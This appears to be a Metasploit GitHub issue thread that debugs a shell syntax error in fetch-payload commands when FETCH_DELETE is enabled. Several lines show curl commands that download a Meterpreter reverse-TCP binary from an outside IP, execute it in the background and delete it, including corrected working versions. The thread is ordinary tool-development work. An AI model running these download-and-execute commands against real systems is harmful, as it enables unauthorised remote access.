Reports of Fetch payloads failing when FETCH_DELETE is set to TRUE

[bwatters-r7]

@h00die-gr3y mentioned that there were reports of Fetch payloads failing when FETCH_DELETE was set to true. I'm looking for examples to see if we can recreate and correct.

[h00die-gr3y]

Hi @bwatters-r7 ,
Just returned from holiday.
I will do some testing this weekend to get you some additional info on the issue.

[h00die-gr3y]

@bwatters-r7 ,
Just checked with payload cmd/linux/http/x64/meterpreter/reverse_tcp your command line that you are using to remove the payload when FETCH_DELETE is set to true.
See example below:

curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/v-3F_vu1N5ZH7UH1KuehWQ; chmod +x /tmp/zMoATqjBXhsa; /tmp/zMoATqjBXhsa &; rm -rf /tmp/zMoATqjBXhsa
/bin/sh: 76: Syntax error: ";" unexpected

Unfortunate the third command in your multi commandline /tmp/zMoATqjBXhsa &; will throw a syntax error (in bash, sh and most other shells). There needs to be a command before ;

The correct way to do this is using (...) creating a subshell or using brackets { ... }

Example using (...)
curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/v-3F_vu1N5ZH7UH1KuehWQ; chmod +x /tmp/zMoATqjBXhsa; (/tmp/zMoATqjBXhsa &); rm -rf /tmp/zMoATqjBXhsa

Example using { ... }
curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/v-3F_vu1N5ZH7UH1KuehWQ; chmod +x /tmp/zMoATqjBXhsa; { /tmp/zMoATqjBXhsa & }; rm -rf /tmp/zMoATqjBXhsa

Note that the braces are more picky about syntax. The space after { and the space before } is required. In some situations, the braces are more efficient because they don't fork a new subshell.
See also the POSIX standard Shell & Utilities 2. Shell Command Language and in particular section 2.9.4 Compound Commands

Just try it out in a linux shell yourself.

PS: Windows targets with similar payloads cmd/windows/http/x64/meterpreter/reverse_tcp are working fine.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[h00die-gr3y]

@bwatters-r7 Do you need more background on the fix for this bug?

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.